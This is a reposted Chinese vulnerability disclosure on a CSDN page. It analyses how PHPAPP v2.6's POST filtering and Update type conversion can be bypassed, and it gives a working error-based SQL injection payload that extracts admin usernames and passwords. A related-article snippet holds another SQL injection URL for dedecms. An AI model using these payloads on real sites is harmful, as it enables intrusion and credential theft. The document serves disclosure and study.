php member limit,PHPAPP注入第四枚(各种无视过滤)

最新推荐文章于 2021-03-20 01:06:45 发布
最新推荐文章于 2021-03-20 01:06:45 发布
阅读量416 收藏
点赞数
文章标签: php member limit

PHPAPP 安全漏洞 POST注入 过滤绕过 数据类型转换
关键词由CSDN通过智能技术生成

### 简要描述:

PHPAPP注入第四枚(各种无视过滤)

### 详细说明:

在wooyun上看到了有人提了PHPAPP的漏洞: http://wooyun.org/bugs/wooyun-2010-055604,然后去官网看了看,前几天刚有更新,就在官网下了PHPAPP最新的v2.6来看看(2014-12-11更新的)。

PSOT注入点:wwww.xxx.com/member.php?action=1&app=43&cid=1&rid=2, 存在漏洞的文件在/phpapp/apps/refund/member_phpapp.php

下面分析一下漏洞产生的原因

第一处绕过:

先看看是如何得到$_POST中的内容的,$this->POST=$this->POSTArray();去看看POSTArray()

/phpapp/apps/core/class/core_class_phpapp.php

```

function POSTArray(){

$postarr=array();

if(is_array($_POST)){

foreach($_POST as $key=>$value){

$keyarr=explode('_',$key);

$count=count($keyarr);

if($count>1){

$keyname='';

for($i=0;$i

if($keyname){

$keyname.='_'.$keyarr[$i];

}else{

$keyname=$keyarr[$i];

}

}

if($keyarr[$count-1]=='s'){

$isajax=empty($_SERVER['HTTP_X_REQUESTED_WITH']) ? '' : $_SERVER['HTTP_X_REQUESTED_WITH'];

if($isajax=='XMLHttpRequest'){

$value=$this->ConvertStr($value);

}

$postarr[$keyname]=$this->str($value,0,1,0,0,0,1);

}elseif($keyarr[$count-1]=='d'){

$postarr[$keyname]=intval($value);

}elseif($keyarr[$count-1]=='f'){

$postarr[$keyname]=floatval($value);

}else{

$postarr[$key]=$value;

}

}else{

$postarr[$key]=$value;

}

}

}

return $postarr;

}

```

可以看到有这么一句判断if($keyarr[$count-1]=='s'),即如果key的最后一个字母是’s’时,条件成立,用户的输入会经过str方法的防注处理。

如何绕过呢?当然是把key的最后一个字母’_s’删掉!

第二处绕过:

```

if($consumearr['cid']>0){

$sellerarr=$this->GetMysqlOne('uid,username'," ".$this->GetTable('member')." WHERE uid='$consumearr[selleruid]' ");

$buyerarr=$this->GetMysqlOne('uid,username'," ".$this->GetTable('member')." WHERE uid='$consumearr[buyeruid]' ");

if($this->uid!=$consumearr['buyeruid']){

$this->Refresh('对不起!您没有权限操作!',SURL.'/member.php?app='.$this->app.'&action=1&cid='.$this->cid.'&rid='.$this->rid.'&op=1');

}

if($this->POST['submit']){

if($this->IsSQL('refund_money',"WHERE cid='$this->cid' AND process=3")){

$this->Refresh('该订单您已经申请退款并处理过了!',SURL.'/member.php?app='.$this->app.'&action=1');

}

if($consumearr['process']!=6){

$this->POST['money']=floatval($this->POST['money']);

$this->POST['content']=$this->str($this->POST['content'],0,0,0,1,0,0,1);

$consumemoney=$consumearr['amount']+$consumearr['fee'];

if($this->POST['money']> $consumemoney){

$this->Refresh('对不起您申请的退款金额不能大于 '.$consumemoney.' 元!',SURL.'/member.php?app='.$this->app.'&action=1&cid='.$this->cid);

}

include_once(Core.'/class/photo_upload_phpapp.php');

if($_FILES['buyerphoto']['size']>0){

$photoid=empty($refund['buyerphoto']) ? 0 : intval($refund['buyerphoto']);

$upload=new UploadPhoto($_FILES['buyerphoto'],$photoid);

$photoid=$upload->CheckUpload();

}else{

if(!empty($refund['buyerphoto'])){

$photoid=intval($refund['buyerphoto']);

}

}

$this->Update('consume',array('refundmoney'=>$this->POST['money'],'process'=>4),array()," WHERE cid='$consumearr[cid]'");

$edittxt='';

if($this->rid>0){

$edittxt='修改了';

}

if($this->rid>0){

$this->Update('refund_money',$this->POST,array('dateline'=>$this->NowTime(),'buyeruid'=>$consumearr['buyeruid'],'selleruid'=>$consumearr['selleruid'],'tid'=>$consumearr['tid'],'cid'=>$consumearr['cid'],'oid'=>$consumearr['oid'],'buyerphoto'=>$photoid,'process'=>1)," WHERE rid='$this->rid' AND buyeruid='$this->uid'");

}

```

再往下看,看到了这句$this->Update('refund_money',$this->POST,array('dateline'=>$this->NowTime(),'buyeruid'=>$consumearr['buyeruid'],'selleruid'=>$consumearr['selleruid'],'tid'=>$consumearr['tid'],'cid'=>$consumearr['cid'],'oid'=>$consumearr['oid'],'buyerphoto'=>$photoid,'process'=>1)," WHERE rid='$this->rid' AND buyeruid='$this->uid'");把整个post的内容带入了Update方法

再去看看Update方法,/phpapp/apps/core/class/mysql_class_phpapp.php

```

//表名, 修改数组,添加合并数组,条件

function Update($tablename,$setarray=array(),$addarr=array(),$whereif=''){

$setarray=array_merge($setarray,$addarr);

$deletearr=$this->GetMysqlFieldArray($tablename);

if($setarray){

$sqlset='';

foreach($setarray as $key=>$value){

$_key=strtolower($key);

if(isset($deletearr[$_key])){

$value=$this->dataTypeConvert($value,$deletearr[$_key]);

if($sqlset){

$sqlset.=',`'.$_key.'`=\''.$value.'\'';

}else{

$sqlset='`'.$_key.'`=\''.$value.'\'';

}

}

}

$query=sprintf('UPDATE %s SET %s %s',$this->GetTable($tablename),$sqlset,$whereif);

//exit($query);

return $this->MysqlQuery($query);

}else{

return false;

}

}

```

Update代码防注分析:

1、通过GetMysqlFieldArray方法获取数据表的所有字段名及每个字段对应的属性;

2、判断用户post的内容中的key是否是数据表中的字段名,防止了key的注入;

3、通过dataTypeConvert方法把用户提交的数据按数据表中各字段的类型进行防注转换。

如果以上每一步的代码都正确实现了的话,应该是没有办法注入的,但是这里的第3步中,也就是dataTypeConvert方法的实现时有疏忽,看下面代码。

```

function dataTypeConvert($data,$type){

switch($type){

case 'int':

$data=intval($data);

break;

case 'real':

$data=doubleval($data);

break;

case 'timestamp':

$data=intval($data);

break;

case 'string':

case 'year':

case 'date':

case 'time':

case 'datetime':

case 'blob':

default:

//$data=intval($data);

break;

}

return $data;

}

```

只对int、real、timestamp做了处理,其他的类型这里没有处理。

绕过方法:

在提交http请求时,可以提交其他类型的参数,但其他参数必须是数据表(phpapp_refund_money)中的字段,且类型不是int、real、timestamp的参数。这里有多个参数可以注入。

测试时请保证自己的账号有可退款的订单,如果没有的话,(真实的网站肯定可以有订单)为了测试方便,把if($consumearr['cid']>0)改为if(true==true)且把if($this->uid!=$consumearr['buyeruid']){ $this->Refresh('对不起!您没有权限操作!',SURL.'/member.php?app='.$this->app.'&action=1&cid='.$this->cid.'&rid='.$this->rid.'&op=1'); }注释掉

下面以sellercontent为例进行证明:

Phpapp可以显错,那就用error-based blind进行注入。

Pyload:(POST提交)

```

cid=1&submit=2&sellercontent=test' or(select 1 from (select count(*),concat(floor(rand(0)*2),(select concat

(0x23,username,0x23,password) from phpapp_member limit 0,1))a from information_schema.tables group by a)b) or'

```

注入成功,管理员用户名及密码如下图中所示:

[注入成功副本.jpg](https://images.seebug.org/upload/201412/2523363403d37214f83c1894eb3246e295bac3e0.jpg)

### 漏洞证明:

见 详细证明

loading-bars.svg

weixin_39962889
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
宝塔php memory_limit,优化宝塔面板提高网站运行速度教程
weixin_42514752的博客
03-21 2446
当我们安装完成BT(宝塔面板)建好网站之后,然后需要给面板和服务器做一些简单的设置,比如说php优化、myql优化、开启php缓存、网站流量限制等等来提高服务器的性能,当然对于你用了BT(宝塔面板)来说,这些步骤都很简单,我们直接都是可以在面板里面来操作。一、定期释放内存添加计划任务,大家可以设置每天或一周释放一次,间隔时间根据自己网站情况定,我是每天执行一次释放内存,执行时机都是选在夜深人静的时...
APP微信登录后端PHP,PHP开发微信授权登录教程
weixin_32207065的博客
03-10 1995
微信的授权登录和QQ、新浪等平台的授权登录都大同小异,均采用OauthOAuth2.0鉴权方式。微信授权分为两种:1、静默授权2、弹窗授权,需要用户手动同意两种scope的区别说明1、以snsapi_base为scope发起的网页授权,是用来获取进入页面的用户的openid的,并且是静默授权并自动跳转到回调页的。用户感知的就是直接进入了回调页(往往是业务页面)2、以snsapi_userinfo为...
php学习实例]会员系统member完整版
08-27
php学习实例]会员系统member完整版,包含所有数据库文件
php member limit,php 安全有关问题
weixin_42352842的博客
03-20 235
php 安全问题做web开发,相信搭建都知道一些安全基本知识,”千万不能相信客户端数据“。而php又是一种弱类型语言。很多人在开发过程中忽略了类型转换,参数过滤直接量成不可估量的后果。不使用过滤函数可能出现以下情况:数据库被(sql)注入。直接可以导致你的系统崩溃,系统数据丢失,用户信息丢失。网站被挂马,遇到文件处理则可以将你的网站文件删除。另外值得一提的是很多人认为开启php安全模式就万事大吉了...
php member limit,PHPAPP注入第十枚(未过滤
weixin_39972019的博客
03-20 92
### 简要描述:PHPAPP注入第十枚(未过滤)### 详细说明:在wooyun上看到了有人提了PHPAPP的漏洞: http://wooyun.org/bugs/wooyun-2010-055604,然后去官网看了看,前几天刚有更新,就在官网下了PHPAPP最新的v2.6来看看(2014-12-11更新的)。PSOT注入点:wwww.xxx.com/member.php?app=48&...
discuz 修改member.php,member_getpasswd.php这是什么文件。发现被修改过。
weixin_34093995的博客
03-19 1258
/*** [Discuz!] (C)2001-2099 Comsenz Inc.* This is NOT a freeware, use is subject to license terms** $Id: member_getpasswd.php 35030 2014-10-23 07:43:23Z laoguozhang $*/if(!defined('IN_D...
Oracle P6 App(移动端TeamMember)
05-30
Oracle Primavera P6 移动端应用,也是TeamMember的移动版 •The approvals page honors your preferences for displaying Activity ID and Project ID. • You can group status update cards by project, ...
php 登录漏洞,PHPCMS用户登陆SQL注入漏洞分析
weixin_33856590的博客
03-11 1315
0x00 简述之前manning在调漏洞的时候,突然发现正常登陆不上去了,当时帮忙跟了下phpcms的登陆流程。之后感觉这个流程貌似有些问题,就仔细看了下,没想到真是一个0day~~0x01 漏洞原理我们先直接看这个漏洞最根源的地方,phpsso/index.php文件所有的操作都存在严重的注入问题,这个类文件的构造函数最先调用它的父构造函数,通过auth_key来解析POST传入的data内容,...
m.555lu.co/vlist.php_新浪微博V2接口演示程序-Powered by Sina App Engine
weixin_39823299的博客
12-22 1万+
From 074a730042679675bd13da3d5bdd64cf901af781 Mon Sep 17 00:00:00 2001From: Elmer Zhang Date: Mon, 12 Nov 2012 15:05:48 +0800Subject: [PATCH] =?UTF-8?q?=E4=BF=AE=E6=94=B9=E7=9B=AE=E5=BD=95=E7=BB=93?==...
php完整的分页类_php自定义分页类完整实例
weixin_39861624的博客
03-09 130
header("Content-type:text/html;Charset=utf-8");class SubPages{private $each_disNums;//每页显示的条目数private $nums;//总条目数private $current_page;//当前被选中的页private $sub_pages;//每次显示的页数private $pageNums;//总页数priv...
php redis限流,【PHP】用Redis实现限流的常见方案
weixin_35106801的博客
03-16 468
标签:就会生成altzsetstrrandfont一个示例限流实现的思路比较多,一般比较常见的思路有 计数器,滑动窗口,令牌桶。而Redis有着丰富的数据结构以及分布式的支持,使用Redis实现限流的业务还是比较适合的。并且在Redis 4.0 上可以安装限流模块 redis-cell,其思路也是令牌桶,其提供了限流的原子操作使用起来很方便可靠。计数...
MySQL相关知识整理
Jeromeyoung
12-13 831
文章目录前言第一章 MySQL是什么?第二章 数据库的五个基本单位第三章 Mysql连接数据库第四章 Mysql数据库操作一、创建数据库二、查看数据库三、选中数据库四、查看数据库中的表五、删除数据库第五章 Mysql数据表操作一、创建表二、查看表字段结构信息三、查看表创建语句四、删除表五、指定表引擎和字符集第六章 Mysql数据字段操作一、查看表结构二、修改表字段类型 modify三、增加表字段四、删除表字段五、表字段改名六、修改表字段排列顺序七、修改表名第七章 Mysql数据类型第八章 Mysql字符.
PHP之用户验证和标签推荐的简单使用
weixin_33797791的博客
10-29 182
本篇主要是讲解一些最简单的验证知识 效果图 bookmark_fns.php <?php require_once('output_fns.php'); require_once('db_fns.php'); require_once('data_valid_fns.php'); require_once('url_fns.php'); require_once('user_auth_...
医疗保险 member.php,dedecms /member/pm.php 会员中心注入漏洞及解决方案
weixin_39756445的博客
03-11 137
1. 漏洞描述Dedecms会员中心注入漏洞2. 漏洞触发条件http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1' and char(@`'`) and 1=2+UniOn+SelEct 1,2,3,4,5,6,7,8,9,10,11,12%20%23如果报错: Safe Alert: Request Error step ...
猜测 member.php,PHPMPS v2.3 /member.php SQL注入漏洞
weixin_30301989的博客
03-10 378
/member.phpcase 'send':$paycenter = trim($_POST['paycenter']);$contactname = trim($_POST['contactname']);$telephone = trim($_POST['telephone']);$email = trim($_POST['email']);$username = trim($_POST['...
购物 member.php,PHP 实现机器学习挖掘用户的购物习惯
weixin_39682697的博客
03-16 127
开场白经常听说某某某专攻机器学习的程序猿的年薪百万,AI 更是火得不得了,提起这些基本都是 Python 、Java、Go、甚至 JavaScript 都有就是没有我们 PHP 什么事,这我就不服我了啊。毕竟PHP 是世界上最好的语言虽然 PHP 的生态导致无法落地机器学习,但还是可以做一些简单的数据分析工作的。安装这里推荐 php-ml 这个库,其中包含各种算法,交叉验证,神经网络,预处理,特征...
如何修改PHP的memory_limit限制
蓝色月光
10-11 1181
在运行PHP程序,通常会遇到“Fatal Error: Allowed memory size of xxxxxx bytes exhausted”的错误, 这个意味着PHP脚本使用了过多的内存,并超出了系统对其设置的允许最大内存。解决这个问题,首先需要查看你的程序是否分配了过多
PHP+Mysql 实现用户登录,注册界面
热门推荐
小锤队长的博客
07-28 3万+
目标: 实现用户的登录 、注册 、修改密码、重置密码、添加书签,显示书签,删除书签 等功能 进一步目标: 实现对 用户输入信息的控制,具体表现在 对注册信息、登录信息的 的过滤,具有简单的防sql注入的功能 首先明确结构:把自定义的函数集中放在两个脚本 bm_functions.php 和 output_functions.php 中 完成后的各个界面: 登录界面: 注册界...
PHP Mysqli 连接MySQL与数据库操作指南
if ($stmt = $conn->prepare("SELECT username, password FROM member WHERE username=? AND password=?")) { $stmt->bind_param("ss", $username, $password); $stmt->execute(); $stmt->bind_result($U, $P); ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值